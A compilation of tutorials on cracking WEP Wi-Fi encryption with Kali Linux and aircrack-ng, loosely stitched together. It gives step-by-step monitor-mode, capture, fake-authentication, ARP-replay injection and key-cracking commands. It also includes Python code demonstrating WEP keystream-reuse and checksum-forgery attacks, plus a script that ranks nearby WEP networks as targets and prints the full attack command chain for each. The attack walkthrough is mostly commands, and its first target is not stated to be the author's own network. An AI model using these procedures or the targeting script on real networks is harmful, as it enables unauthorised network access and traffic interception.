Crack Wep With Kali

> It’s easy with Aircrack-ng

You probably already know this, but Kali Linux ships with the Aircrack-ng suite, a neat set of tools that is a godsend for penetration testers and ethical hackers.

Do you know how easy it is to crack a WEP key with Kali Linux? The whole process takes about 10 to 15 minutes and rarely fails. WEP protection is outdated and weak, and Kali Linux running Aircrack-ng makes short work of it. A few commands here and a few commands there and you have the WEP key of your test router in your hands.

So, let’s begin cracking a WEP key!

> Cracking WEP passwords using Kali Linux

  1. Open up a Terminal window.
  2. Enter: airmon-ng
  3. Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0.
  4. Enter: airmon-ng start wlan0. If the output reports that monitor mode was enabled, your card is in monitor mode.
  5. Note down the monitoring interface’s name (“monitor mode enabled on mon0 “). In my case it is mon0 so I will be using mon0.
  6. Enter: airodump-ng mon0
  7. My target is “mtnl”, which uses WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and its BSSID is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng -w mtnl-org -c 4 --bssid 0C:D2:B5:03:43:68 mon0
  8. After about 15,000 data frames (shown in the #Data column) have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP key.

> Conclusion

Well… that was pretty painless. The whole process took around 10 minutes for me, but it may vary for you: the rate at which data frames arrive largely depends on how busy the network is and on the signal strength. Now you have the target network’s WEP key in your hands. What will you do with it?

Today we are going to take a closer look at the vulnerabilities in the WEP (Wired Equivalent Privacy) protocol and see how to exploit those vulnerabilities and how hackers can gain access to a Wi-Fi network they don’t already have access to. We will be using the aircrack-ng software to facilitate the attack from a Kali Linux installation, but I wanted to point out a few caveats, warnings, and explanations before we dig into the demonstration.

First of all, you should note that part of the attack process is similar to cracking the WPA and WPA2 Wi-Fi protocols. However, WEP is a different protocol altogether, so beyond putting the wireless interface into monitor mode and running the capture, the process is a little different. In addition, we are not going to take advantage of a handshake and reconnection flaw and perform a dictionary-based attack as we did with WPA. Instead, we are going to monitor wireless data and capture packets to deduce the key from some well-known vulnerabilities.

WEP Vulnerabilities vs WPA Vulnerabilities

Before we begin the WEP cracking demonstration, you should have a general understanding of the protocol, its vulnerabilities, and how they differ from WPA and WPA2. First off, WEP encrypts with RC4, a stream cipher. For every frame it seeds RC4 with a 24-bit initialisation vector (IV), sent in the clear, concatenated with the shared 40- or 104-bit key, and XORs the resulting ‘random’ keystream with the data. The IV space is so small that keystreams repeat on a busy network within hours, and the way the key and IV are combined has been exploited for years.

There are several ways that WEP vulnerabilities can be exploited. One common attack exploits keystream reuse: when two frames are encrypted under the same IV, and therefore the same keystream, XORing the two ciphertexts (Exclusive Or) cancels the keystream and leaves the XOR of the two plaintexts. With known or guessable plaintext in one frame, the other frame is recovered.

Another fatal flaw is the integrity check: WEP uses a CRC-32 checksum, the ICV, to detect changes in transit. CRC-32 is linear and unkeyed, not a MAC, so an attacker can flip chosen bits of the ciphertext and patch the encrypted checksum to a value the receiver accepts as valid, without knowing the key. However, this is just the tip of the iceberg regarding WEP vulnerabilities, and you should know that these security flaws give rise to both passive and active attacks.

Conversely, WPA suffers from weaknesses in TKIP (Temporal Key Integrity Protocol), which allow limited packet decryption and spoofing against networks that still use TKIP; WPA2 with CCMP does not share them, and what usually breaks WPA/WPA2-PSK in practice is a weak passphrase attacked with a dictionary from a captured handshake. While the underlying mechanics of WEP and WPA are very different, aircrack-ng on Kali handles both attacks: WEP in minutes, WPA only as fast as the dictionary allows.

One of the key differences between our attacks is how we attack the protocol. In the WPA and WPA2 tutorial, we used a dictionary of passwords to find the key. This time, however, we are going to intercept wireless packets out of the air with airodump-ng, part of the aircrack-ng suite (though there are many other packet sniffers), to collect enough IVs to derive the key.

Attack Types

Passive attacks are facilitated by a wiretapping technique: the attacker just listens to wireless communications until an IV repeats, which means two frames were encrypted with the same keystream. Then, the attacker can use software to deduce the contents of the data. Because of weaknesses in how RC4 is keyed in WEP, an attacker who gathers enough frames can also cross-check the IVs statistically to recover the key itself and gain network access.

Conversely, an active attack can be used when an attacker already knows the plaintext of an encrypted message. Then, the attacker can craft additional encrypted packets to fool the WEP device. Because the integrity check is a linear CRC-32 checksum rather than a keyed hash, the attacker can adjust it to match the modified data, causing the WEP device to erroneously accept the packets as valid. This is a type of injection attack, and such attacks are surprisingly easy to carry out.
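To make the two flaws above concrete, here is an added example (not code from the page or from aircrack-ng) that builds a toy WEP frame the way the protocol does (RC4 seeded with IV || key, a CRC-32 ICV appended to the plaintext) and then carries out both attacks: the passive one, recovering a second frame from an IV collision plus one known plaintext, and the active one, flipping bits in a ciphertext and patching the encrypted ICV so the receiver accepts it. The key, IV and frame contents are constructed for the demonstration, and RC4 is implemented inline so it runs offline.

```python
"""Toy WEP encapsulation showing two of the weaknesses discussed above:
keystream reuse when an IV repeats (passive) and CRC-32 ICV malleability (active).
Added example, not code from the page or from aircrack-ng; key, IV and frame
contents are constructed, and RC4 is implemented inline so it runs offline."""
import zlib
from typing import Tuple


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA then PRGA): n bytes of keystream for the given key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < n:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR; callers keep both inputs the same length."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP's integrity check value: plain CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Seed RC4 with IV || key, encrypt plaintext || ICV, prepend the clear IV."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Tuple[bytes, bool]:
    """Return (plaintext, icv_ok) exactly as a receiving station would."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, got = clear[:-4], clear[-4:]
    return plaintext, got == icv(plaintext)


def keystream_reuse(frame1: bytes, frame2: bytes, known_plain1: bytes) -> bytes:
    """Passive attack on an IV collision: C1 xor C2 = P1 xor P2 because both
    frames used the same keystream, so a known P1 (with its ICV) yields P2.
    Both frames are assumed to carry equal-length payloads."""
    assert frame1[:3] == frame2[:3], "needs the same IV on both frames"
    p1_body = known_plain1 + icv(known_plain1)
    return xor(xor(frame1[3:], frame2[3:]), p1_body)[:-4]


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Active attack: CRC-32 is affine, crc(P xor D) = crc(P) xor crc(D) xor crc(0..0),
    so XOR D into the ciphertext and patch the encrypted ICV with crc(D) xor crc(0..0).
    Neither the key nor the plaintext is needed, only the position of the change."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n, "delta must cover the whole payload (zero where unchanged)"
    icv_fix = xor(icv(delta), icv(bytes(n)))
    return iv + xor(body, delta + icv_fix)


def demo() -> Tuple[bytes, bytes, bool, bool]:
    key = b"12345"                    # constructed 40-bit key, 5 ASCII bytes
    iv = b"\x01\x02\x03"              # constructed IV; only 2^24 exist, so reuse is quick
    p1 = b"GET /index.html HTTP/1.0"  # 24 bytes, assumed known to the attacker
    p2 = b"secret-session-token-xyz"  # 24 bytes, the frame the attacker wants to read
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)     # same IV, same keystream
    recovered = keystream_reuse(c1, c2, p1)

    delta = xor(b"GET ", b"PUT ") + bytes(len(p1) - 4)  # change only the HTTP verb
    forged_plain, forged_ok = wep_decrypt(key, flip_bits(c1, delta))
    # The same flip without fixing the ICV: the receiver rejects it.
    naive = c1[:3] + xor(c1[3:], delta + bytes(4))
    _, naive_ok = wep_decrypt(key, naive)
    return recovered, forged_plain, forged_ok, naive_ok


if __name__ == "__main__":
    print(demo())
```

The passive half is why a busy network is the attacker’s friend: every repeated IV is another pair of frames whose keystream cancels. The active half is why aireplay-ng can inject traffic at all: a forged frame with a patched ICV looks valid to the access point.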

Getting Started

Before you begin, you are going to need several things to build an environment where you can begin hacking. As always, you should know that you don’t have the legal right to misuse this information in public to attack real-life networks, so you should only attempt this exploit in the privacy of your home network. You are going to need the following five items before we can begin:

  1. A computer system running Kali Linux
  2. A wireless router using WEP that you own and control
  3. The aircrack-ng software
  4. A wireless interface that can be run in monitor mode to collect packets
  5. Another wireless host connected to the router

Step 1

Make sure your wireless card is seen in your Kali Linux system. You can run the ifconfig command to look for wireless interfaces. You should see an Ethernet and loopback interface, but we are interested in the interface that starts with a ‘w.’ Likely, the wireless interface you want to use will be wlan0 unless you have multiple wireless cards.

Step 2

Next, we are going to use airmon-ng (part of the aircrack-ng suite) to put your wireless interface into monitor mode, which will allow it to capture wireless frames from other devices to facilitate the attack. You will need to run the following command:

  • airmon-ng start wlan0

Note that you may have a wireless interface with a different name. If your interface’s name is wlan1 or something else, use it in place of wlan0. Make special note of the output, because it will create a listening interface, likely named mon0.

Step 3

Then we will start using the dump command to grab packets from other wireless devices, and the software will be able to make calculations and comparisons among the data to break the insecure WEP protocol. Enter the following command:

  • airodump-ng mon0

Step 4

Now it is time to tell your wireless interface to start storing captured wireless data based on the network of your choosing. Remember to plug in three key pieces of information from the previous output into the following command:

  • airodump-ng -w [ESSID] -c [Channel] --bssid [BSSID] mon0

More specifically, you will need to plug in the ESSID (used here only as the capture file prefix), the channel number (CH), and the BSSID. The -w option makes airodump-ng write everything it captures for that network to [ESSID]-01.cap (the -01 suffix is added automatically and increments on each run), so there is no separate save command. Watch the #Data column: it counts captured data frames, each carrying an IV, and that is what aircrack-ng needs; beacons do not help. You will want at least 10,000 before you move on to the remaining steps.

Step 5

Last but not least, you are going to need to do the most important step of the process by actually using the captured data from the WEP device. Issue the following command:

  • aircrack-ng [file-name].cap

If all goes according to plan, you should be able to break the WEP key. However, if the command fails because there are not enough IVs, leave the capture running until your wireless card has gathered more data frames, say 15,000, and then try again.

Caveats and Differences from WPA

You’ll probably note that the attack procedure has fewer steps than the WPA/WPA2 attack procedure. While it may seem simpler on the surface, you should know that the WEP attack process revolves around capturing data transmitted by other wireless hosts. If there is only one host connected to the network or hosts aren’t sending much data, it will take longer to gather enough data for the attack to work. On the other hand, the WPA/WPA2 attack centered around using a dictionary of passwords after forcing a host to reconnect.

Final Thoughts

It is a simple matter to break WEP encryption provided you have the right tools, but be warned. You shouldn’t ever abuse this knowledge. Doing so could lead to severe consequences that negatively impact your life. Make sure that you only attempt these attacks on devices that you own, and make sure that you never use WEP to secure your wireless access points and routers.

This is a multiple-part series for someone new to wireless hacking, with pictures and videos.

Kali Linux and WEP Hacking

WEP is the original widely used encryption standard on routers. WEP is notoriously easy to hack. Even though WEP is rarely seen anymore it still does pop up every now and again.

Penetration Testing Setup

Set up an old router, log into it, and configure WEP for wireless security so it can serve as a test router. Keep one other computer, tablet, or smartphone connected to it wirelessly, since the encrypted traffic between the two is what has to be captured.

Open a terminal window by pressing the terminal icon at the top left.

Next, type the command “airmon-ng” (without the quotes) to see whether your adapter is recognised by Kali Linux. It should show the interface, chipset, and driver. If it doesn’t, some troubleshooting is needed to find out why the adapter is not seen.

Next, type “airmon-ng start wlan0” to set the USB adapter into monitor mode, and note the name of the monitor interface it reports (normally mon0).

(If the adapter comes up enabled on mon1 or mon2, simply use that instead of mon0.)

Now run “airodump-ng mon0” to list the nearby networks and note the channel and BSSID of your test router. Then, in a second terminal window, start a capture against that router only, writing the frames to a file:

airodump-ng -w (ESSID) -c (channel) --bssid (BSSID) mon0

For me this would be:

airodump-ng -w dlink -c 6 --bssid 00:26:5A:F2:57:2B mon0

Change the file name, channel, and BSSID to match your test router. Copy the information from the first terminal window; copying and pasting the BSSID into the new terminal window is much quicker than typing it for most people.

After this is done correctly a window will come up showing information about the target router. The main feedback to watch is the Beacons and #Data columns; #Data is the number of data frames (IVs) captured, and that is what aircrack-ng needs.

To speed up IV collection, open a third terminal window and leave the second one capturing. In the new window, aireplay-ng is used in two steps. First, fake-authenticate with the access point so that it accepts frames from your adapter: “aireplay-ng -1 0 -a (BSSID) mon0”. For this example that is aireplay-ng -1 0 -a 00:26:5A:F2:57:2B mon0

Then run the ARP request replay attack, which captures an ARP request from the connected client and re-injects it so the router keeps answering with freshly encrypted frames, each with a new IV: “aireplay-ng -3 -b (BSSID) mon0”. For this example it would be the following:

aireplay-ng -3 -b 00:26:5A:F2:57:2B mon0

To use aircrack-ng we need the capture file that airodump-ng is writing to the hard drive; in this example its prefix is dlink. Open a new terminal window and type the command “ls” to see the files. The one aircrack-ng needs is the .cap file, here called “dlink-01.cap”.

To start aircrack-ng run the command “aircrack-ng (file name)”, so here that would be:

aircrack-ng dlink-01.cap

Aircrack-ng will read the captured IVs and start cracking the key. If it reports that there are not enough IVs, leave the capture and the replay running and run it again later; it finishes with a “KEY FOUND!” line.

After “KEY FOUND!” it shows the key in hexadecimal and, where the bytes are printable, in ASCII. They are the same key and either form can be used to join the network. For this example the key on the router was 12345.
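All three walkthroughs above follow the same loop: scan, pick a WEP network, capture on its channel, inject to speed up IVs, and run aircrack-ng once enough IVs are in. Here is an added example (not from the page or from the aircrack-ng project) that automates the target selection: it reads the CSV airodump-ng writes next to the .cap file when started with -w, lists the WEP networks with their IV counts and associated clients, applies the 10,000-IV rule of thumb from the tutorial, and emits the airodump-ng / aireplay-ng / aircrack-ng lines for the chosen target. The CSV column order is airodump-ng’s as I know it (AP table, blank line, station table); the rows are constructed, and the file name, interface name and MIN_IVS threshold are assumptions.

```python
"""Select a WEP target from airodump-ng's CSV output and emit the commands from
the procedure above for it. Added example, not from the page or aircrack-ng.
The CSV layout (AP table, blank line, station table) is airodump-ng's as I know
it; the rows below are constructed, and the 10,000-IV threshold is the tutorial's
rule of thumb, not a guarantee."""
import csv
import io
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed stand-in for dlink-01.csv as written by `airodump-ng -w dlink ...`.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:26:5A:F2:57:2B, 2014-03-01 10:00:00, 2014-03-01 10:12:00,  6,  54, WEP , WEP, OPN, -41,      720,    16210,   0.  0.  0.  0,   5, dlink, 
0C:D2:B5:03:43:68, 2014-03-01 10:00:03, 2014-03-01 10:12:00,  4,  54, WEP , WEP, SKA, -63,      690,     2103,   0.  0.  0.  0,   4, mtnl, 
AA:BB:CC:DD:EE:FF, 2014-03-01 10:00:05, 2014-03-01 10:11:58, 11,  54, WPA2, CCMP, PSK, -70,      660,        0,   0.  0.  0.  0,   6, office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
3C:15:C2:11:22:33, 2014-03-01 10:00:10, 2014-03-01 10:12:00, -50,     15880, 00:26:5A:F2:57:2B, dlink
"""

MIN_IVS = 10000  # tutorial's rule of thumb; 104-bit keys usually need more


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # WEP, WPA, WPA2, OPN ...
    ivs: int       # "# IV" in the CSV, the "#Data" column on the live screen
    essid: str
    clients: int = 0


def parse_airodump_csv(text: str) -> List[AccessPoint]:
    """Parse the AP table and count associated stations per BSSID."""
    ap_part, _, sta_part = text.partition("\n\n")
    aps: Dict[str, AccessPoint] = {}
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":
            continue  # header line or a short/garbled line
        ap = AccessPoint(row[0], int(row[3]), row[5].strip(), int(row[10]), row[13])
        aps[ap.bssid] = ap
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) >= 6 and row[5] in aps:  # "(not associated)" rows are skipped
            aps[row[5]].clients += 1
    return list(aps.values())


def wep_targets(aps: List[AccessPoint]) -> List[AccessPoint]:
    """WEP networks only, the one with the most IVs (then most clients) first."""
    return sorted((ap for ap in aps if ap.privacy == "WEP"),
                  key=lambda ap: (ap.ivs, ap.clients), reverse=True)


def ready_to_crack(ap: AccessPoint, min_ivs: int = MIN_IVS) -> bool:
    """Only captured IVs count towards the threshold; beacons do not help aircrack-ng."""
    return ap.ivs >= min_ivs


def commands(ap: AccessPoint, iface: str = "mon0", prefix: Optional[str] = None) -> List[str]:
    """The capture, fake-auth, ARP-replay and crack lines for one target.
    airodump-ng names its first capture file <prefix>-01.cap."""
    prefix = prefix or ap.essid
    return [
        f"airodump-ng -w {prefix} -c {ap.channel} --bssid {ap.bssid} {iface}",
        f"aireplay-ng -1 0 -a {ap.bssid} {iface}",
        f"aireplay-ng -3 -b {ap.bssid} {iface}",
        f"aircrack-ng {prefix}-01.cap",
    ]


if __name__ == "__main__":
    for ap in wep_targets(parse_airodump_csv(SAMPLE_CSV)):
        state = "ready" if ready_to_crack(ap) else "keep capturing"
        print(f"{ap.essid:10} ch{ap.channel:<3} {ap.ivs:>7} IVs {ap.clients} client(s): {state}")
        for line in commands(ap):
            print("   ", line)
```

Run against a real dlink-01.csv by reading the file into parse_airodump_csv instead of SAMPLE_CSV. The point of sorting on IVs and clients together is the caveat from the second walkthrough: a WEP network with no associated client yields almost no data frames, and ARP replay has nothing to replay, so it is the worst target however strong its signal.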

